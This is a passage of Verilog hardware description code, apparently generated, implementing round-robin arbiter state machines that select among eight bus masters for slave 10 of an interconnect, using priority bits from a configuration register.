                        s10_msel_arb0_next_state = s10_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s10_msel_arb0_req[6] ) 
                        begin
                            s10_msel_arb0_next_state = s10_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s10_msel_arb0_req[7] ) 
                            begin
                                s10_msel_arb0_next_state = s10_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s10_msel_arb0_req[0] ) 
                                begin
                                    s10_msel_arb0_next_state = s10_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb0_req[1] ) 
                                    begin
                                        s10_msel_arb0_next_state = s10_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb0_req[2] ) 
                                        begin
                                            s10_msel_arb0_next_state = s10_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb0_grant4:
        begin
            if (  !( s10_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s10_msel_arb0_req[5] ) 
                begin
                    s10_msel_arb0_next_state = s10_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s10_msel_arb0_req[6] ) 
                    begin
                        s10_msel_arb0_next_state = s10_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s10_msel_arb0_req[7] ) 
                        begin
                            s10_msel_arb0_next_state = s10_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s10_msel_arb0_req[0] ) 
                            begin
                                s10_msel_arb0_next_state = s10_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s10_msel_arb0_req[1] ) 
                                begin
                                    s10_msel_arb0_next_state = s10_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb0_req[2] ) 
                                    begin
                                        s10_msel_arb0_next_state = s10_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb0_req[3] ) 
                                        begin
                                            s10_msel_arb0_next_state = s10_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb0_grant5:
        begin
            if (  !( s10_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s10_msel_arb0_req[6] ) 
                begin
                    s10_msel_arb0_next_state = s10_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s10_msel_arb0_req[7] ) 
                    begin
                        s10_msel_arb0_next_state = s10_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s10_msel_arb0_req[0] ) 
                        begin
                            s10_msel_arb0_next_state = s10_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s10_msel_arb0_req[1] ) 
                            begin
                                s10_msel_arb0_next_state = s10_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s10_msel_arb0_req[2] ) 
                                begin
                                    s10_msel_arb0_next_state = s10_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb0_req[3] ) 
                                    begin
                                        s10_msel_arb0_next_state = s10_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb0_req[4] ) 
                                        begin
                                            s10_msel_arb0_next_state = s10_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb0_grant6:
        begin
            if (  !( s10_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s10_msel_arb0_req[7] ) 
                begin
                    s10_msel_arb0_next_state = s10_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s10_msel_arb0_req[0] ) 
                    begin
                        s10_msel_arb0_next_state = s10_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s10_msel_arb0_req[1] ) 
                        begin
                            s10_msel_arb0_next_state = s10_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s10_msel_arb0_req[2] ) 
                            begin
                                s10_msel_arb0_next_state = s10_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s10_msel_arb0_req[3] ) 
                                begin
                                    s10_msel_arb0_next_state = s10_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb0_req[4] ) 
                                    begin
                                        s10_msel_arb0_next_state = s10_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb0_req[5] ) 
                                        begin
                                            s10_msel_arb0_next_state = s10_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb0_grant7:
        begin
            if (  !( s10_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s10_msel_arb0_req[0] ) 
                begin
                    s10_msel_arb0_next_state = s10_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s10_msel_arb0_req[1] ) 
                    begin
                        s10_msel_arb0_next_state = s10_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s10_msel_arb0_req[2] ) 
                        begin
                            s10_msel_arb0_next_state = s10_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s10_msel_arb0_req[3] ) 
                            begin
                                s10_msel_arb0_next_state = s10_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s10_msel_arb0_req[4] ) 
                                begin
                                    s10_msel_arb0_next_state = s10_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb0_req[5] ) 
                                    begin
                                        s10_msel_arb0_next_state = s10_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb0_req[6] ) 
                                        begin
                                            s10_msel_arb0_next_state = s10_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s10_msel_arb1_req = { ( s10_msel_req[7] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) } == 2'd1 ) ), ( s10_msel_req[6] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) } == 2'd1 ) ), ( s10_msel_req[5] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) } == 2'd1 ) ), ( s10_msel_req[4] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) } == 2'd1 ) ), ( s10_msel_req[3] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) } == 2'd1 ) ), ( s10_msel_req[2] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) } == 2'd1 ) ), ( s10_msel_req[1] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) } == 2'd1 ) ), ( s10_msel_req[0] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s10_msel_arb1_state <= s10_msel_arb1_grant0;
        end
        else
        begin 
            s10_msel_arb1_state <= s10_msel_arb1_next_state;
        end
    end
    always @ (  s10_msel_arb1_state or  { ( s10_msel_req[7] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) } == 2'd1 ) ), ( s10_msel_req[6] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) } == 2'd1 ) ), ( s10_msel_req[5] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) } == 2'd1 ) ), ( s10_msel_req[4] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) } == 2'd1 ) ), ( s10_msel_req[3] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) } == 2'd1 ) ), ( s10_msel_req[2] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) } == 2'd1 ) ), ( s10_msel_req[1] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) } == 2'd1 ) ), ( s10_msel_req[0] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s10_msel_arb1_next_state = s10_msel_arb1_state;
        case ( s10_msel_arb1_state ) 
        s10_msel_arb1_grant0:
        begin
            if (  !( s10_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s10_msel_arb1_req[1] ) 
                begin
                    s10_msel_arb1_next_state = s10_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s10_msel_arb1_req[2] ) 
                    begin
                        s10_msel_arb1_next_state = s10_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s10_msel_arb1_req[3] ) 
                        begin
                            s10_msel_arb1_next_state = s10_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s10_msel_arb1_req[4] ) 
                            begin
                                s10_msel_arb1_next_state = s10_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s10_msel_arb1_req[5] ) 
                                begin
                                    s10_msel_arb1_next_state = s10_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb1_req[6] ) 
                                    begin
                                        s10_msel_arb1_next_state = s10_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb1_req[7] ) 
                                        begin
                                            s10_msel_arb1_next_state = s10_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb1_grant1:
        begin
            if (  !( s10_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s10_msel_arb1_req[2] ) 
                begin
                    s10_msel_arb1_next_state = s10_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s10_msel_arb1_req[3] ) 
                    begin
                        s10_msel_arb1_next_state = s10_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s10_msel_arb1_req[4] ) 
                        begin
                            s10_msel_arb1_next_state = s10_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s10_msel_arb1_req[5] ) 
                            begin
                                s10_msel_arb1_next_state = s10_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s10_msel_arb1_req[6] ) 
                                begin
                                    s10_msel_arb1_next_state = s10_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb1_req[7] ) 
                                    begin
                                        s10_msel_arb1_next_state = s10_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb1_req[0] ) 
                                        begin
                                            s10_msel_arb1_next_state = s10_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb1_grant2:
        begin
            if (  !( s10_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s10_msel_arb1_req[3] ) 
                begin
                    s10_msel_arb1_next_state = s10_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s10_msel_arb1_req[4] ) 
                    begin
                        s10_msel_arb1_next_state = s10_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s10_msel_arb1_req[5] ) 
                        begin
                            s10_msel_arb1_next_state = s10_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s10_msel_arb1_req[6] ) 
                            begin
                                s10_msel_arb1_next_state = s10_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s10_msel_arb1_req[7] ) 
                                begin
                                    s10_msel_arb1_next_state = s10_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb1_req[0] ) 
                                    begin
                                        s10_msel_arb1_next_state = s10_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb1_req[1] ) 
                                        begin
                                            s10_msel_arb1_next_state = s10_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb1_grant3:
        begin
            if (  !( s10_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s10_msel_arb1_req[4] ) 
                begin
                    s10_msel_arb1_next_state = s10_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s10_msel_arb1_req[5] ) 
                    begin
                        s10_msel_arb1_next_state = s10_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s10_msel_arb1_req[6] ) 
                        begin
                            s10_msel_arb1_next_state = s10_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s10_msel_arb1_req[7] ) 
                            begin
                                s10_msel_arb1_next_state = s10_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s10_msel_arb1_req[0] ) 
                                begin
                                    s10_msel_arb1_next_state = s10_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb1_req[1] ) 
                                    begin
                                        s10_msel_arb1_next_state = s10_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb1_req[2] ) 
                                        begin
                                            s10_msel_arb1_next_state = s10_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb1_grant4:
        begin
            if (  !( s10_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s10_msel_arb1_req[5] ) 
                begin
                    s10_msel_arb1_next_state = s10_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s10_msel_arb1_req[6] ) 
                    begin
                        s10_msel_arb1_next_state = s10_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s10_msel_arb1_req[7] ) 
                        begin
                            s10_msel_arb1_next_state = s10_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s10_msel_arb1_req[0] ) 
                            begin
                                s10_msel_arb1_next_state = s10_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s10_msel_arb1_req[1] ) 
                                begin
                                    s10_msel_arb1_next_state = s10_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb1_req[2] ) 
                                    begin
                                        s10_msel_arb1_next_state = s10_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb1_req[3] ) 
                                        begin
                                            s10_msel_arb1_next_state = s10_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb1_grant5:
        begin
            if (  !( s10_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s10_msel_arb1_req[6] ) 
                begin
                    s10_msel_arb1_next_state = s10_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s10_msel_arb1_req[7] ) 
                    begin
                        s10_msel_arb1_next_state = s10_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s10_msel_arb1_req[0] ) 
                        begin
                            s10_msel_arb1_next_state = s10_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s10_msel_arb1_req[1] ) 
                            begin
                                s10_msel_arb1_next_state = s10_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s10_msel_arb1_req[2] ) 
                                begin
                                    s10_msel_arb1_next_state = s10_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb1_req[3] ) 
                                    begin
                                        s10_msel_arb1_next_state = s10_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb1_req[4] ) 
                                        begin
                                            s10_msel_arb1_next_state = s10_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb1_grant6:
        begin
            if (  !( s10_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s10_msel_arb1_req[7] ) 
                begin
                    s10_msel_arb1_next_state = s10_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s10_msel_arb1_req[0] ) 
                    begin
                        s10_msel_arb1_next_state = s10_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s10_msel_arb1_req[1] ) 
                        begin
                            s10_msel_arb1_next_state = s10_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s10_msel_arb1_req[2] ) 
                            begin
                                s10_msel_arb1_next_state = s10_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s10_msel_arb1_req[3] ) 
                                begin
                                    s10_msel_arb1_next_state = s10_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb1_req[4] ) 
                                    begin
                                        s10_msel_arb1_next_state = s10_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb1_req[5] ) 
                                        begin
                                            s10_msel_arb1_next_state = s10_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb1_grant7:
        begin
            if (  !( s10_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s10_msel_arb1_req[0] ) 
                begin
                    s10_msel_arb1_next_state = s10_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s10_msel_arb1_req[1] ) 
                    begin
                        s10_msel_arb1_next_state = s10_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s10_msel_arb1_req[2] ) 
                        begin
                            s10_msel_arb1_next_state = s10_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s10_msel_arb1_req[3] ) 
                            begin
                                s10_msel_arb1_next_state = s10_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s10_msel_arb1_req[4] ) 
                                begin
                                    s10_msel_arb1_next_state = s10_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb1_req[5] ) 
                                    begin
                                        s10_msel_arb1_next_state = s10_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb1_req[6] ) 
                                        begin
                                            s10_msel_arb1_next_state = s10_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s10_msel_arb2_req = { ( s10_msel_req[7] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) } == 2'd2 ) ), ( s10_msel_req[6] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) } == 2'd2 ) ), ( s10_msel_req[5] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) } == 2'd2 ) ), ( s10_msel_req[4] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) } == 2'd2 ) ), ( s10_msel_req[3] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) } == 2'd2 ) ), ( s10_msel_req[2] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) } == 2'd2 ) ), ( s10_msel_req[1] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) } == 2'd2 ) ), ( s10_msel_req[0] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s10_msel_arb2_state <= s10_msel_arb2_grant0;
        end
        else
        begin 
            s10_msel_arb2_state <= s10_msel_arb2_next_state;
        end
    end
    always @ (  s10_msel_arb2_state or  { ( s10_msel_req[7] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) } == 2'd2 ) ), ( s10_msel_req[6] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) } == 2'd2 ) ), ( s10_msel_req[5] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) } == 2'd2 ) ), ( s10_msel_req[4] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) } == 2'd2 ) ), ( s10_msel_req[3] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) } == 2'd2 ) ), ( s10_msel_req[2] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) } == 2'd2 ) ), ( s10_msel_req[1] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) } == 2'd2 ) ), ( s10_msel_req[0] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s10_msel_arb2_next_state = s10_msel_arb2_state;
        case ( s10_msel_arb2_state ) 
        s10_msel_arb2_grant0:
        begin
            if (  !( s10_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s10_msel_arb2_req[1] ) 
                begin
                    s10_msel_arb2_next_state = s10_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s10_msel_arb2_req[2] ) 
                    begin
                        s10_msel_arb2_next_state = s10_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s10_msel_arb2_req[3] ) 
                        begin
                            s10_msel_arb2_next_state = s10_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s10_msel_arb2_req[4] ) 
                            begin
                                s10_msel_arb2_next_state = s10_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s10_msel_arb2_req[5] ) 
                                begin
                                    s10_msel_arb2_next_state = s10_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb2_req[6] ) 
                                    begin
                                        s10_msel_arb2_next_state = s10_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb2_req[7] ) 
                                        begin
                                            s10_msel_arb2_next_state = s10_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb2_grant1:
        begin
            if (  !( s10_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s10_msel_arb2_req[2] ) 
                begin
                    s10_msel_arb2_next_state = s10_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s10_msel_arb2_req[3] ) 
                    begin
                        s10_msel_arb2_next_state = s10_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s10_msel_arb2_req[4] ) 
                        begin
                            s10_msel_arb2_next_state = s10_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s10_msel_arb2_req[5] ) 
                            begin
                                s10_msel_arb2_next_state = s10_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s10_msel_arb2_req[6] ) 
                                begin
                                    s10_msel_arb2_next_state = s10_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb2_req[7] ) 
                                    begin
                                        s10_msel_arb2_next_state = s10_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb2_req[0] ) 
                                        begin
                                            s10_msel_arb2_next_state = s10_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb2_grant2:
        begin
            if (  !( s10_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s10_msel_arb2_req[3] ) 
                begin
                    s10_msel_arb2_next_state = s10_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s10_msel_arb2_req[4] ) 
                    begin
                        s10_msel_arb2_next_state = s10_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s10_msel_arb2_req[5] ) 
                        begin
                            s10_msel_arb2_next_state = s10_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s10_msel_arb2_req[6] ) 
                            begin
                                s10_msel_arb2_next_state = s10_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s10_msel_arb2_req[7] ) 
                                begin
                                    s10_msel_arb2_next_state = s10_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb2_req[0] ) 
                                    begin
                                        s10_msel_arb2_next_state = s10_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb2_req[1] ) 
                                        begin
                                            s10_msel_arb2_next_state = s10_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb2_grant3:
        begin
            if (  !( s10_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s10_msel_arb2_req[4] ) 
                begin
                    s10_msel_arb2_next_state = s10_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s10_msel_arb2_req[5] ) 
                    begin
                        s10_msel_arb2_next_state = s10_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s10_msel_arb2_req[6] ) 
                        begin
                            s10_msel_arb2_next_state = s10_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s10_msel_arb2_req[7] ) 
                            begin
                                s10_msel_arb2_next_state = s10_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s10_msel_arb2_req[0] ) 
                                begin
                                    s10_msel_arb2_next_state = s10_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb2_req[1] ) 
                                    begin
                                        s10_msel_arb2_next_state = s10_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb2_req[2] ) 
                                        begin
                                            s10_msel_arb2_next_state = s10_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb2_grant4:
        begin
            if (  !( s10_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s10_msel_arb2_req[5] ) 
                begin
                    s10_msel_arb2_next_state = s10_msel_arb2_grant5;
                end
                else
                begin 
